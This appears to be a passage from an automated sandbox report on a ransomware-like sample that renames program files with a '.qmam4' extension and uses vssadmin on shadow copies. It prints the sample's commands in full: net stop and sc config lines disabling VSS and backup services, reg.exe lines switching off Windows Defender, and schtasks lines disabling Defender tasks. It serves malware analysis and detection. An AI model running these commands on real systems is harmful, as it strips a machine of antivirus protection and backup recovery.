| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Retail-ul-oob.xrm-ms.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\W5.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\WideTile.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL078.XML.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_KAAAACgAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-60_altform-colorize.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\HoloAssets\HoloLens_HandTracking.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\30.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sk-sk\ui-strings.js.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\ui-strings.js.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeWideTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_MAK_AE-ul-oob.xrm-ms.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_FAAAABQAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN111.XML.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_PgAAAD4AAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\rsod\dcfmui.msi.16.en-us.boot.tree.dat.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_IgAAACIAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunec.jar.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_MAAAADAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Logs\CBS\CBS.log | C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\pending.xml | C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe | N/A |
Launches sc.exe
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\MusNotifyIcon.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\MusNotifyIcon.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132897432933229199" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "3908" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.006584" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4316" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "7.594226" | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "9.373302" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4120" | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "21.604469" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" | C:\Windows\System32\svchost.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe
"C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_1ccfd" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_1ccfd" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_1ccfd" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\MusNotifyIcon.exe
%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
